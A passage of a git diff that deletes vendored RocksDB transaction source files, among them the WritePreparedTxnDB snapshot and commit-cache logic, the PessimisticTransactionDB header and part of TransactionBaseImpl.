-    if (delayed_prepared_.find(prep_seq) != delayed_prepared_.end()) {
-      // Then it is not committed yet
-      return false;
-    }
-  }
-  auto indexed_seq = prep_seq % COMMIT_CACHE_SIZE;
-  CommitEntry cached;
-  bool exist = GetCommitEntry(indexed_seq, &cached);
-  if (!exist) {
-    // It is not committed, so it must be still prepared
-    return false;
-  }
-  if (prep_seq == cached.prep_seq) {
-    // It is committed and also not evicted from commit cache
-    return cached.commit_seq <= snapshot_seq;
-  }
-  // At this point we dont know if it was committed or it is still prepared
-  auto max_evicted_seq = max_evicted_seq_.load(std::memory_order_acquire);
-  if (max_evicted_seq < prep_seq) {
-    // Not evicted from cache and also not present, so must be still prepared
-    return false;
-  }
-  // When advancing max_evicted_seq_, we move older entires from prepared to
-  // delayed_prepared_. Also we move evicted entries from commit cache to
-  // old_commit_map_ if it overlaps with any snapshot. Since prep_seq <=
-  // max_evicted_seq_, we have three cases: i) in delayed_prepared_, ii) in
-  // old_commit_map_, iii) committed with no conflict with any snapshot (i)
-  // delayed_prepared_ is checked above
-  if (max_evicted_seq < snapshot_seq) {  // then (ii) cannot be the case
-    // only (iii) is the case: committed
-    // commit_seq <= max_evicted_seq_ < snapshot_seq => commit_seq <
-    // snapshot_seq
-    return true;
-  }
-  // else (ii) might be the case: check the commit data saved for this snapshot.
-  // If there was no overlapping commit entry, then it is committed with a
-  // commit_seq lower than any live snapshot, including snapshot_seq.
-  if (old_commit_map_empty_.load(std::memory_order_acquire)) {
-    return true;
-  }
-  {
-    // We should not normally reach here
-    ReadLock rl(&old_commit_map_mutex_);
-    auto old_commit_entry = old_commit_map_.find(prep_seq);
-    if (old_commit_entry == old_commit_map_.end() ||
-        old_commit_entry->second <= snapshot_seq) {
-      return true;
-    }
-  }
-  // (ii) it the case: it is committed but after the snapshot_seq
-  return false;
-}
-
-void WritePreparedTxnDB::AddPrepared(uint64_t seq) {
-  ROCKS_LOG_DEBUG(info_log_, "Txn %" PRIu64 " Prepareing", seq);
-  WriteLock wl(&prepared_mutex_);
-  prepared_txns_.push(seq);
-}
-
-void WritePreparedTxnDB::AddCommitted(uint64_t prepare_seq,
-                                      uint64_t commit_seq) {
-  ROCKS_LOG_DEBUG(info_log_, "Txn %" PRIu64 " Committing with %" PRIu64,
-                  prepare_seq, commit_seq);
-  auto indexed_seq = prepare_seq % COMMIT_CACHE_SIZE;
-  CommitEntry evicted;
-  bool to_be_evicted = GetCommitEntry(indexed_seq, &evicted);
-  if (to_be_evicted) {
-    auto prev_max = max_evicted_seq_.load(std::memory_order_acquire);
-    if (prev_max < evicted.commit_seq) {
-      // TODO(myabandeh) inc max in larger steps to avoid frequent updates
-      auto max_evicted_seq = evicted.commit_seq;
-      // When max_evicted_seq_ advances, move older entries from prepared_txns_
-      // to delayed_prepared_. This guarantees that if a seq is lower than max,
-      // then it is not in prepared_txns_ ans save an expensive, synchronized
-      // lookup from a shared set. delayed_prepared_ is expected to be empty in
-      // normal cases.
-      {
-        WriteLock wl(&prepared_mutex_);
-        while (!prepared_txns_.empty() &&
-               prepared_txns_.top() <= max_evicted_seq) {
-          auto to_be_popped = prepared_txns_.top();
-          delayed_prepared_.insert(to_be_popped);
-          prepared_txns_.pop();
-          delayed_prepared_empty_.store(false, std::memory_order_release);
-        }
-      }
-
-      // With each change to max_evicted_seq_ fetch the live snapshots behind it
-      SequenceNumber curr_seq;
-      std::vector<SequenceNumber> all_snapshots;
-      bool update_snapshots = false;
-      {
-        InstrumentedMutex(db_impl_->mutex());
-        // We use this to identify how fresh are the snapshot list. Since this
-        // is done atomically with obtaining the snapshot list, the one with
-        // the larger seq is more fresh. If the seq is equal the full snapshot
-        // list could be different since taking snapshots does not increase
-        // the db seq. However since we only care about snapshots before the
-        // new max, such recent snapshots would not be included the in the
-        // list anyway.
-        curr_seq = db_impl_->GetLatestSequenceNumber();
-        if (curr_seq > snapshots_version_) {
-          // This is to avoid updating the snapshots_ if it already updated
-          // with a more recent vesion by a concrrent thread
-          update_snapshots = true;
-          // We only care about snapshots lower then max
-          all_snapshots =
-              db_impl_->snapshots().GetAll(nullptr, max_evicted_seq);
-        }
-      }
-      if (update_snapshots) {
-        WriteLock wl(&snapshots_mutex_);
-        snapshots_version_ = curr_seq;
-        // We update the list concurrently with the readers.
-        // Both new and old lists are sorted and the new list is subset of the
-        // previous list plus some new items. Thus if a snapshot repeats in
-        // both new and old lists, it will appear upper in the new list. So if
-        // we simply insert the new snapshots in order, if an overwritten item
-        // is still valid in the new list is either written to the same place in
-        // the array or it is written in a higher palce before it gets
-        // overwritten by another item. This guarantess a reader that reads the
-        // list bottom-up will eventaully see a snapshot that repeats in the
-        // update, either before it gets overwritten by the writer or
-        // afterwards.
-        size_t i = 0;
-        auto it = all_snapshots.begin();
-        for (; it != all_snapshots.end() && i < SNAPSHOT_CACHE_SIZE;
-             it++, i++) {
-          snapshot_cache_[i].store(*it, std::memory_order_release);
-        }
-        snapshots_.clear();
-        for (; it != all_snapshots.end(); it++) {
-          // Insert them to a vector that is less efficient to access
-          // concurrently
-          snapshots_.push_back(*it);
-        }
-        // Update the size at the end. Otherwise a parallel reader might read
-        // items that are not set yet.
-        snapshots_total_.store(all_snapshots.size(), std::memory_order_release);
-      }
-      while (prev_max < max_evicted_seq &&
-             !max_evicted_seq_.compare_exchange_weak(
-                 prev_max, max_evicted_seq, std::memory_order_release,
-                 std::memory_order_acquire)) {
-      };
-    }
-    // After each eviction from commit cache, check if the commit entry should
-    // be kept around because it overlaps with a live snapshot.
-    // First check the snapshot cache that is efficient for concurrent access
-    auto cnt = snapshots_total_.load(std::memory_order_acquire);
-    // The list might get updated concurrently as we are reading from it. The
-    // reader should be able to read all the snapshots that are still valid
-    // after the update. Since the survived snapshots are written in a higher
-    // place before gets overwritten the reader that reads bottom-up will
-    // eventully see it.
-    const bool next_is_larger = true;
-    SequenceNumber snapshot_seq = kMaxSequenceNumber;
-    size_t ip1 = std::min(cnt, SNAPSHOT_CACHE_SIZE);
-    for (; 0 < ip1; ip1--) {
-      snapshot_seq = snapshot_cache_[ip1 - 1].load(std::memory_order_acquire);
-      if (!MaybeUpdateOldCommitMap(evicted.prep_seq, evicted.commit_seq,
-                                   snapshot_seq, !next_is_larger)) {
-        break;
-      }
-    }
-    if (UNLIKELY(SNAPSHOT_CACHE_SIZE < cnt && ip1 == SNAPSHOT_CACHE_SIZE &&
-                 snapshot_seq < evicted.prep_seq)) {
-      // Then access the less efficient list of snapshots_
-      ReadLock rl(&snapshots_mutex_);
-      // Items could have moved from the snapshots_ to snapshot_cache_ before
-      // accquiring the lock. To make sure that we do not miss a valid snapshot,
-      // read snapshot_cache_ again while holding the lock.
-      for (size_t i = 0; i < SNAPSHOT_CACHE_SIZE; i++) {
-        snapshot_seq = snapshot_cache_[i].load(std::memory_order_acquire);
-        if (!MaybeUpdateOldCommitMap(evicted.prep_seq, evicted.commit_seq,
-                                     snapshot_seq, next_is_larger)) {
-          break;
-        }
-      }
-      for (auto snapshot_seq_2 : snapshots_) {
-        if (!MaybeUpdateOldCommitMap(evicted.prep_seq, evicted.commit_seq,
-                                     snapshot_seq_2, next_is_larger)) {
-          break;
-        }
-      }
-    }
-  }
-  bool succ =
-      ExchangeCommitEntry(indexed_seq, evicted, {prepare_seq, commit_seq});
-  if (!succ) {
-    // A very rare event, in which the commit entry is updated before we do.
-    // Here we apply a very simple solution of retrying.
-    // TODO(myabandeh): do precautions to detect bugs that cause infinite loops
-    AddCommitted(prepare_seq, commit_seq);
-    return;
-  }
-  {
-    WriteLock wl(&prepared_mutex_);
-    prepared_txns_.erase(prepare_seq);
-    bool was_empty = delayed_prepared_.empty();
-    if (!was_empty) {
-      delayed_prepared_.erase(prepare_seq);
-      bool is_empty = delayed_prepared_.empty();
-      if (was_empty != is_empty) {
-        delayed_prepared_empty_.store(is_empty, std::memory_order_release);
-      }
-    }
-  }
-}
-
-bool WritePreparedTxnDB::GetCommitEntry(uint64_t indexed_seq,
-                                        CommitEntry* entry) {
-  // TODO(myabandeh): implement lock-free commit_cache_
-  ReadLock rl(&commit_cache_mutex_);
-  *entry = commit_cache_[indexed_seq];
-  return (entry->commit_seq != 0);  // initialized
-}
-
-bool WritePreparedTxnDB::AddCommitEntry(uint64_t indexed_seq,
-                                        CommitEntry& new_entry,
-                                        CommitEntry* evicted_entry) {
-  // TODO(myabandeh): implement lock-free commit_cache_
-  WriteLock wl(&commit_cache_mutex_);
-  *evicted_entry = commit_cache_[indexed_seq];
-  commit_cache_[indexed_seq] = new_entry;
-  return (evicted_entry->commit_seq != 0);  // initialized
-}
-
-bool WritePreparedTxnDB::ExchangeCommitEntry(uint64_t indexed_seq,
-                                             CommitEntry& expected_entry,
-                                             CommitEntry new_entry) {
-  // TODO(myabandeh): implement lock-free commit_cache_
-  WriteLock wl(&commit_cache_mutex_);
-  auto& evicted_entry = commit_cache_[indexed_seq];
-  if (evicted_entry.prep_seq != expected_entry.prep_seq) {
-    return false;
-  }
-  commit_cache_[indexed_seq] = new_entry;
-  return true;
-}
-
-// 10m entry, 80MB size
-size_t WritePreparedTxnDB::DEF_COMMIT_CACHE_SIZE = static_cast<size_t>(1 << 21);
-size_t WritePreparedTxnDB::DEF_SNAPSHOT_CACHE_SIZE =
-    static_cast<size_t>(1 << 7);
-
-bool WritePreparedTxnDB::MaybeUpdateOldCommitMap(
-    const uint64_t& prep_seq, const uint64_t& commit_seq,
-    const uint64_t& snapshot_seq, const bool next_is_larger = true) {
-  // If we do not store an entry in old_commit_map we assume it is committed in
-  // all snapshots. if commit_seq <= snapshot_seq, it is considered already in
-  // the snapshot so we need not to keep the entry around for this snapshot.
-  if (commit_seq <= snapshot_seq) {
-    // continue the search if the next snapshot could be smaller than commit_seq
-    return !next_is_larger;
-  }
-  // then snapshot_seq < commit_seq
-  if (prep_seq <= snapshot_seq) {  // overlapping range
-    WriteLock wl(&old_commit_map_mutex_);
-    old_commit_map_empty_.store(false, std::memory_order_release);
-    old_commit_map_[prep_seq] = commit_seq;
-    // Storing once is enough. No need to check it for other snapshots.
-    return false;
-  }
-  // continue the search if the next snapshot could be larger than prep_seq
-  return next_is_larger;
-}
-
-}  //  namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/transactions/pessimistic_transaction_db.h b/thirdparty/rocksdb/utilities/transactions/pessimistic_transaction_db.h
deleted file mode 100644
index e3eec6b..0000000
--- a/thirdparty/rocksdb/utilities/transactions/pessimistic_transaction_db.h
+++ /dev/null
@@ -1,316 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include <mutex>
-#include <queue>
-#include <set>
-#include <string>
-#include <unordered_map>
-#include <vector>
-
-#include "rocksdb/db.h"
-#include "rocksdb/options.h"
-#include "rocksdb/utilities/transaction_db.h"
-#include "utilities/transactions/pessimistic_transaction.h"
-#include "utilities/transactions/transaction_lock_mgr.h"
-#include "utilities/transactions/write_prepared_txn.h"
-
-namespace rocksdb {
-
-class PessimisticTransactionDB : public TransactionDB {
- public:
-  explicit PessimisticTransactionDB(DB* db,
-                                    const TransactionDBOptions& txn_db_options);
-
-  explicit PessimisticTransactionDB(StackableDB* db,
-                                    const TransactionDBOptions& txn_db_options);
-
-  virtual ~PessimisticTransactionDB();
-
-  Status Initialize(const std::vector<size_t>& compaction_enabled_cf_indices,
-                    const std::vector<ColumnFamilyHandle*>& handles);
-
-  Transaction* BeginTransaction(const WriteOptions& write_options,
-                                const TransactionOptions& txn_options,
-                                Transaction* old_txn) override = 0;
-
-  using StackableDB::Put;
-  virtual Status Put(const WriteOptions& options,
-                     ColumnFamilyHandle* column_family, const Slice& key,
-                     const Slice& val) override;
-
-  using StackableDB::Delete;
-  virtual Status Delete(const WriteOptions& wopts,
-                        ColumnFamilyHandle* column_family,
-                        const Slice& key) override;
-
-  using StackableDB::Merge;
-  virtual Status Merge(const WriteOptions& options,
-                       ColumnFamilyHandle* column_family, const Slice& key,
-                       const Slice& value) override;
-
-  using StackableDB::Write;
-  virtual Status Write(const WriteOptions& opts, WriteBatch* updates) override;
-
-  using StackableDB::CreateColumnFamily;
-  virtual Status CreateColumnFamily(const ColumnFamilyOptions& options,
-                                    const std::string& column_family_name,
-                                    ColumnFamilyHandle** handle) override;
-
-  using StackableDB::DropColumnFamily;
-  virtual Status DropColumnFamily(ColumnFamilyHandle* column_family) override;
-
-  Status TryLock(PessimisticTransaction* txn, uint32_t cfh_id,
-                 const std::string& key, bool exclusive);
-
-  void UnLock(PessimisticTransaction* txn, const TransactionKeyMap* keys);
-  void UnLock(PessimisticTransaction* txn, uint32_t cfh_id,
-              const std::string& key);
-
-  void AddColumnFamily(const ColumnFamilyHandle* handle);
-
-  static TransactionDBOptions ValidateTxnDBOptions(
-      const TransactionDBOptions& txn_db_options);
-
-  const TransactionDBOptions& GetTxnDBOptions() const {
-    return txn_db_options_;
-  }
-
-  void InsertExpirableTransaction(TransactionID tx_id,
-                                  PessimisticTransaction* tx);
-  void RemoveExpirableTransaction(TransactionID tx_id);
-
-  // If transaction is no longer available, locks can be stolen
-  // If transaction is available, try stealing locks directly from transaction
-  // It is the caller's responsibility to ensure that the referred transaction
-  // is expirable (GetExpirationTime() > 0) and that it is expired.
-  bool TryStealingExpiredTransactionLocks(TransactionID tx_id);
-
-  Transaction* GetTransactionByName(const TransactionName& name) override;
-
-  void RegisterTransaction(Transaction* txn);
-  void UnregisterTransaction(Transaction* txn);
-
-  // not thread safe. current use case is during recovery (single thread)
-  void GetAllPreparedTransactions(std::vector<Transaction*>* trans) override;
-
-  TransactionLockMgr::LockStatusData GetLockStatusData() override;
-
-  std::vector<DeadlockPath> GetDeadlockInfoBuffer() override;
-  void SetDeadlockInfoBufferSize(uint32_t target_size) override;
-
-  struct CommitEntry {
-    uint64_t prep_seq;
-    uint64_t commit_seq;
-    CommitEntry() : prep_seq(0), commit_seq(0) {}
-    CommitEntry(uint64_t ps, uint64_t cs) : prep_seq(ps), commit_seq(cs) {}
-  };
-
- protected:
-  void ReinitializeTransaction(
-      Transaction* txn, const WriteOptions& write_options,
-      const TransactionOptions& txn_options = TransactionOptions());
-  DBImpl* db_impl_;
-  std::shared_ptr<Logger> info_log_;
-
- private:
-  friend class WritePreparedTxnDB;
-  const TransactionDBOptions txn_db_options_;
-  TransactionLockMgr lock_mgr_;
-
-  // Must be held when adding/dropping column families.
-  InstrumentedMutex column_family_mutex_;
-  Transaction* BeginInternalTransaction(const WriteOptions& options);
-
-  // Used to ensure that no locks are stolen from an expirable transaction
-  // that has started a commit. Only transactions with an expiration time
-  // should be in this map.
-  std::mutex map_mutex_;
-  std::unordered_map<TransactionID, PessimisticTransaction*>
-      expirable_transactions_map_;
-
-  // map from name to two phase transaction instance
-  std::mutex name_map_mutex_;
-  std::unordered_map<TransactionName, Transaction*> transactions_;
-};
-
-// A PessimisticTransactionDB that writes the data to the DB after the commit.
-// In this way the DB only contains the committed data.
-class WriteCommittedTxnDB : public PessimisticTransactionDB {
- public:
-  explicit WriteCommittedTxnDB(DB* db,
-                               const TransactionDBOptions& txn_db_options)
-      : PessimisticTransactionDB(db, txn_db_options) {}
-
-  explicit WriteCommittedTxnDB(StackableDB* db,
-                               const TransactionDBOptions& txn_db_options)
-      : PessimisticTransactionDB(db, txn_db_options) {}
-
-  virtual ~WriteCommittedTxnDB() {}
-
-  Transaction* BeginTransaction(const WriteOptions& write_options,
-                                const TransactionOptions& txn_options,
-                                Transaction* old_txn) override;
-};
-
-// A PessimisticTransactionDB that writes data to DB after prepare phase of 2PC.
-// In this way some data in the DB might not be committed. The DB provides
-// mechanisms to tell such data apart from committed data.
-class WritePreparedTxnDB : public PessimisticTransactionDB {
- public:
-  explicit WritePreparedTxnDB(DB* db,
-                              const TransactionDBOptions& txn_db_options)
-      : PessimisticTransactionDB(db, txn_db_options),
-        SNAPSHOT_CACHE_SIZE(DEF_SNAPSHOT_CACHE_SIZE),
-        COMMIT_CACHE_SIZE(DEF_COMMIT_CACHE_SIZE) {
-    init(txn_db_options);
-  }
-
-  explicit WritePreparedTxnDB(StackableDB* db,
-                              const TransactionDBOptions& txn_db_options)
-      : PessimisticTransactionDB(db, txn_db_options),
-        SNAPSHOT_CACHE_SIZE(DEF_SNAPSHOT_CACHE_SIZE),
-        COMMIT_CACHE_SIZE(DEF_COMMIT_CACHE_SIZE) {
-    init(txn_db_options);
-  }
-
-  virtual ~WritePreparedTxnDB() {}
-
-  Transaction* BeginTransaction(const WriteOptions& write_options,
-                                const TransactionOptions& txn_options,
-                                Transaction* old_txn) override;
-
-  // Check whether the transaction that wrote the value with seqeunce number seq
-  // is visible to the snapshot with sequence number snapshot_seq
-  bool IsInSnapshot(uint64_t seq, uint64_t snapshot_seq);
-  // Add the trasnaction with prepare sequence seq to the prepared list
-  void AddPrepared(uint64_t seq);
-  // Add the transaction with prepare sequence prepare_seq and commit sequence
-  // commit_seq to the commit map
-  void AddCommitted(uint64_t prepare_seq, uint64_t commit_seq);
-
- private:
-  friend class WritePreparedTransactionTest_IsInSnapshotTest_Test;
-
-  void init(const TransactionDBOptions& /* unused */) {
-    snapshot_cache_ = unique_ptr<std::atomic<SequenceNumber>[]>(
-        new std::atomic<SequenceNumber>[SNAPSHOT_CACHE_SIZE] {});
-    commit_cache_ =
-        unique_ptr<CommitEntry[]>(new CommitEntry[COMMIT_CACHE_SIZE]{});
-  }
-
-  // A heap with the amortized O(1) complexity for erase. It uses one extra heap
-  // to keep track of erased entries that are not yet on top of the main heap.
-  class PreparedHeap {
-    std::priority_queue<uint64_t, std::vector<uint64_t>, std::greater<uint64_t>>
-        heap_;
-    std::priority_queue<uint64_t, std::vector<uint64_t>, std::greater<uint64_t>>
-        erased_heap_;
-
-   public:
-    bool empty() { return heap_.empty(); }
-    uint64_t top() { return heap_.top(); }
-    void push(uint64_t v) { heap_.push(v); }
-    void pop() {
-      heap_.pop();
-      while (!heap_.empty() && !erased_heap_.empty() &&
-             heap_.top() == erased_heap_.top()) {
-        heap_.pop();
-        erased_heap_.pop();
-      }
-    }
-    void erase(uint64_t seq) {
-      if (!heap_.empty()) {
-        if (seq < heap_.top()) {
-          // Already popped, ignore it.
-        } else if (heap_.top() == seq) {
-          heap_.pop();
-        } else {  // (heap_.top() > seq)
-          // Down the heap, remember to pop it later
-          erased_heap_.push(seq);
-        }
-      }
-    }
-  };
-
-  // Get the commit entry with index indexed_seq from the commit table. It
-  // returns true if such entry exists.
-  bool GetCommitEntry(uint64_t indexed_seq, CommitEntry* entry);
-  // Rewrite the entry with the index indexed_seq in the commit table with the
-  // commit entry <prep_seq, commit_seq>. If the rewrite results into eviction,
-  // sets the evicted_entry and returns true.
-  bool AddCommitEntry(uint64_t indexed_seq, CommitEntry& new_entry,
-                      CommitEntry* evicted_entry);
-  // Rewrite the entry with the index indexed_seq in the commit table with the
-  // commit entry new_entry only if the existing entry matches the
-  // expected_entry. Returns false otherwise.
-  bool ExchangeCommitEntry(uint64_t indexed_seq, CommitEntry& expected_entry,
-                           CommitEntry new_entry);
-
-  // Add a new entry to old_commit_map_ if prep_seq <= snapshot_seq <
-  // commit_seq. Return false if checking the next snapshot(s) is not needed.
-  // This is the case if the entry already added to old_commit_map_ or none of
-  // the next snapshots could satisfy the condition. next_is_larger: the next
-  // snapshot will be a larger value
-  bool MaybeUpdateOldCommitMap(const uint64_t& prep_seq,
-                               const uint64_t& commit_seq,
-                               const uint64_t& snapshot_seq,
-                               const bool next_is_larger);
-
-  // The list of live snapshots at the last time that max_evicted_seq_ advanced.
-  // The list stored into two data structures: in snapshot_cache_ that is
-  // efficient for concurrent reads, and in snapshots_ if the data does not fit
-  // into snapshot_cache_. The total number of snapshots in the two lists
-  std::atomic<size_t> snapshots_total_ = {};
-  // The list sorted in ascending order. Thread-safety for writes is provided
-  // with snapshots_mutex_ and concurrent reads are safe due to std::atomic for
-  // each entry. In x86_64 architecture such reads are compiled to simple read
-  // instructions. 128 entries
-  // TODO(myabandeh): avoid non-const static variables
-  static size_t DEF_SNAPSHOT_CACHE_SIZE;
-  const size_t SNAPSHOT_CACHE_SIZE;
-  unique_ptr<std::atomic<SequenceNumber>[]> snapshot_cache_;
-  // 2nd list for storing snapshots. The list sorted in ascending order.
-  // Thread-safety is provided with snapshots_mutex_.
-  std::vector<SequenceNumber> snapshots_;
-  // The version of the latest list of snapshots. This can be used to avoid
-  // rewrittiing a list that is concurrently updated with a more recent version.
-  SequenceNumber snapshots_version_ = 0;
-
-  // A heap of prepared transactions. Thread-safety is provided with
-  // prepared_mutex_.
-  PreparedHeap prepared_txns_;
-  // TODO(myabandeh): avoid non-const static variables
-  static size_t DEF_COMMIT_CACHE_SIZE;
-  const size_t COMMIT_CACHE_SIZE;
-  // commit_cache_ must be initialized to zero to tell apart an empty index from
-  // a filled one. Thread-safety is provided with commit_cache_mutex_.
-  unique_ptr<CommitEntry[]> commit_cache_;
-  // The largest evicted *commit* sequence number from the commit_cache_
-  std::atomic<uint64_t> max_evicted_seq_ = {};
-  // A map of the evicted entries from commit_cache_ that has to be kept around
-  // to service the old snapshots. This is expected to be empty normally.
-  // Thread-safety is provided with old_commit_map_mutex_.
-  std::map<uint64_t, uint64_t> old_commit_map_;
-  // A set of long-running prepared transactions that are not finished by the
-  // time max_evicted_seq_ advances their sequence number. This is expected to
-  // be empty normally. Thread-safety is provided with prepared_mutex_.
-  std::set<uint64_t> delayed_prepared_;
-  // Update when delayed_prepared_.empty() changes. Expected to be true
-  // normally.
-  std::atomic<bool> delayed_prepared_empty_ = {true};
-  // Update when old_commit_map_.empty() changes. Expected to be true normally.
-  std::atomic<bool> old_commit_map_empty_ = {true};
-  port::RWMutex prepared_mutex_;
-  port::RWMutex old_commit_map_mutex_;
-  port::RWMutex commit_cache_mutex_;
-  port::RWMutex snapshots_mutex_;
-};
-
-}  //  namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/transactions/transaction_base.cc b/thirdparty/rocksdb/utilities/transactions/transaction_base.cc
deleted file mode 100644
index 4612dfa..0000000
--- a/thirdparty/rocksdb/utilities/transactions/transaction_base.cc
+++ /dev/null
@@ -1,704 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "utilities/transactions/transaction_base.h"
-
-#include "db/db_impl.h"
-#include "db/column_family.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/db.h"
-#include "rocksdb/status.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-TransactionBaseImpl::TransactionBaseImpl(DB* db,
-                                         const WriteOptions& write_options)
-    : db_(db),
-      dbimpl_(reinterpret_cast<DBImpl*>(db)),
-      write_options_(write_options),
-      cmp_(GetColumnFamilyUserComparator(db->DefaultColumnFamily())),
-      start_time_(db_->GetEnv()->NowMicros()),
-      write_batch_(cmp_, 0, true, 0),
-      indexing_enabled_(true) {
-  assert(dynamic_cast<DBImpl*>(db_) != nullptr);
-  log_number_ = 0;
-  if (dbimpl_->allow_2pc()) {
-    WriteBatchInternal::InsertNoop(write_batch_.GetWriteBatch());
-  }
-}
-
-TransactionBaseImpl::~TransactionBaseImpl() {
-  // Release snapshot if snapshot is set
-  SetSnapshotInternal(nullptr);
-}
-
-void TransactionBaseImpl::Clear() {
-  save_points_.reset(nullptr);
-  write_batch_.Clear();
-  commit_time_batch_.Clear();
-  tracked_keys_.clear();
-  num_puts_ = 0;
-  num_deletes_ = 0;
-  num_merges_ = 0;
-
-  if (dbimpl_->allow_2pc()) {
-    WriteBatchInternal::InsertNoop(write_batch_.GetWriteBatch());
-  }
-}
-
-void TransactionBaseImpl::Reinitialize(DB* db,
-                                       const WriteOptions& write_options) {
-  Clear();
-  ClearSnapshot();
-  db_ = db;
-  name_.clear();
-  log_number_ = 0;
-  write_options_ = write_options;
-  start_time_ = db_->GetEnv()->NowMicros();
-  indexing_enabled_ = true;
-  cmp_ = GetColumnFamilyUserComparator(db_->DefaultColumnFamily());
-}
-
-void TransactionBaseImpl::SetSnapshot() {
-  const Snapshot* snapshot = dbimpl_->GetSnapshotForWriteConflictBoundary();
-  SetSnapshotInternal(snapshot);
-}
-
-void TransactionBaseImpl::SetSnapshotInternal(const Snapshot* snapshot) {
-  // Set a custom deleter for the snapshot_ SharedPtr as the snapshot needs to
-  // be released, not deleted when it is no longer referenced.
-  snapshot_.reset(snapshot, std::bind(&TransactionBaseImpl::ReleaseSnapshot,
-                                      this, std::placeholders::_1, db_));
-  snapshot_needed_ = false;
-  snapshot_notifier_ = nullptr;
-}
-
-void TransactionBaseImpl::SetSnapshotOnNextOperation(
-    std::shared_ptr<TransactionNotifier> notifier) {
-  snapshot_needed_ = true;
-  snapshot_notifier_ = notifier;
-}
-
-void TransactionBaseImpl::SetSnapshotIfNeeded() {
-  if (snapshot_needed_) {
-    std::shared_ptr<TransactionNotifier> notifier = snapshot_notifier_;
-    SetSnapshot();
-    if (notifier != nullptr) {
-      notifier->SnapshotCreated(GetSnapshot());
-    }
-  }
-}
-
-Status TransactionBaseImpl::TryLock(ColumnFamilyHandle* column_family,
-                                    const SliceParts& key, bool read_only,
-                                    bool exclusive, bool untracked) {
-  size_t key_size = 0;
-  for (int i = 0; i < key.num_parts; ++i) {
-    key_size += key.parts[i].size();
-  }
-
-  std::string str;
-  str.reserve(key_size);
-
-  for (int i = 0; i < key.num_parts; ++i) {
-    str.append(key.parts[i].data(), key.parts[i].size());
-  }
-
-  return TryLock(column_family, str, read_only, exclusive, untracked);
-}
-
-void TransactionBaseImpl::SetSavePoint() {
-  if (save_points_ == nullptr) {
-    save_points_.reset(new std::stack<TransactionBaseImpl::SavePoint>());
-  }
-  save_points_->emplace(snapshot_, snapshot_needed_, snapshot_notifier_,
-                        num_puts_, num_deletes_, num_merges_);
-  write_batch_.SetSavePoint();
-}
-
-Status TransactionBaseImpl::RollbackToSavePoint() {
-  if (save_points_ != nullptr && save_points_->size() > 0) {
-    // Restore saved SavePoint
-    TransactionBaseImpl::SavePoint& save_point = save_points_->top();
-    snapshot_ = save_point.snapshot_;
-    snapshot_needed_ = save_point.snapshot_needed_;
-    snapshot_notifier_ = save_point.snapshot_notifier_;
-    num_puts_ = save_point.num_puts_;
-    num_deletes_ = save_point.num_deletes_;
-    num_merges_ = save_point.num_merges_;
-
-    // Rollback batch
-    Status s = write_batch_.RollbackToSavePoint();
-    assert(s.ok());
-
-    // Rollback any keys that were tracked since the last savepoint
-    const TransactionKeyMap& key_map = save_point.new_keys_;
-    for (const auto& key_map_iter : key_map) {
-      uint32_t column_family_id = key_map_iter.first;
-      auto& keys = key_map_iter.second;
-
-      auto& cf_tracked_keys = tracked_keys_[column_family_id];
-
-      for (const auto& key_iter : keys) {
-        const std::string& key = key_iter.first;
-        uint32_t num_reads = key_iter.second.num_reads;
-        uint32_t num_writes = key_iter.second.num_writes;
-
-        auto tracked_keys_iter = cf_tracked_keys.find(key);
-        assert(tracked_keys_iter != cf_tracked_keys.end());
-
-        // Decrement the total reads/writes of this key by the number of
-        // reads/writes done since the last SavePoint.
-        if (num_reads > 0) {
-          assert(tracked_keys_iter->second.num_reads >= num_reads);
-          tracked_keys_iter->second.num_reads -= num_reads;
-        }
-        if (num_writes > 0) {
-          assert(tracked_keys_iter->second.num_writes >= num_writes);
-          tracked_keys_iter->second.num_writes -= num_writes;
-        }
-        if (tracked_keys_iter->second.num_reads == 0 &&
-            tracked_keys_iter->second.num_writes == 0) {
-          tracked_keys_[column_family_id].erase(tracked_keys_iter);
-        }
-      }
-    }
-
-    save_points_->pop();
-
-    return s;
-  } else {
-    assert(write_batch_.RollbackToSavePoint().IsNotFound());
-    return Status::NotFound();
-  }
-}
-
-Status TransactionBaseImpl::Get(const ReadOptions& read_options,
-                                ColumnFamilyHandle* column_family,
-                                const Slice& key, std::string* value) {
-  assert(value != nullptr);
-  PinnableSlice pinnable_val(value);
-  assert(!pinnable_val.IsPinned());
-  auto s = Get(read_options, column_family, key, &pinnable_val);
-  if (s.ok() && pinnable_val.IsPinned()) {
-    value->assign(pinnable_val.data(), pinnable_val.size());
-  }  // else value is already assigned
-  return s;
-}
-
-Status TransactionBaseImpl::Get(const ReadOptions& read_options,
-                                ColumnFamilyHandle* column_family,
-                                const Slice& key, PinnableSlice* pinnable_val) {
-  return write_batch_.GetFromBatchAndDB(db_, read_options, column_family, key,
-                                        pinnable_val);
-}
-
-Status TransactionBaseImpl::GetForUpdate(const ReadOptions& read_options,
-                                         ColumnFamilyHandle* column_family,
-                                         const Slice& key, std::string* value,
-                                         bool exclusive) {
-  Status s = TryLock(column_family, key, true /* read_only */, exclusive);
-
-  if (s.ok() && value != nullptr) {
-    assert(value != nullptr);
-    PinnableSlice pinnable_val(value);
-    assert(!pinnable_val.IsPinned());
-    s = Get(read_options, column_family, key, &pinnable_val);
-    if (s.ok() && pinnable_val.IsPinned()) {
-      value->assign(pinnable_val.data(), pinnable_val.size());
-    }  // else value is already assigned
-  }
-  return s;
-}
-
-Status TransactionBaseImpl::GetForUpdate(const ReadOptions& read_options,
-                                         ColumnFamilyHandle* column_family,
-                                         const Slice& key,
-                                         PinnableSlice* pinnable_val,
-                                         bool exclusive) {
-  Status s = TryLock(column_family, key, true /* read_only */, exclusive);
-
-  if (s.ok() && pinnable_val != nullptr) {
-    s = Get(read_options, column_family, key, pinnable_val);
-  }
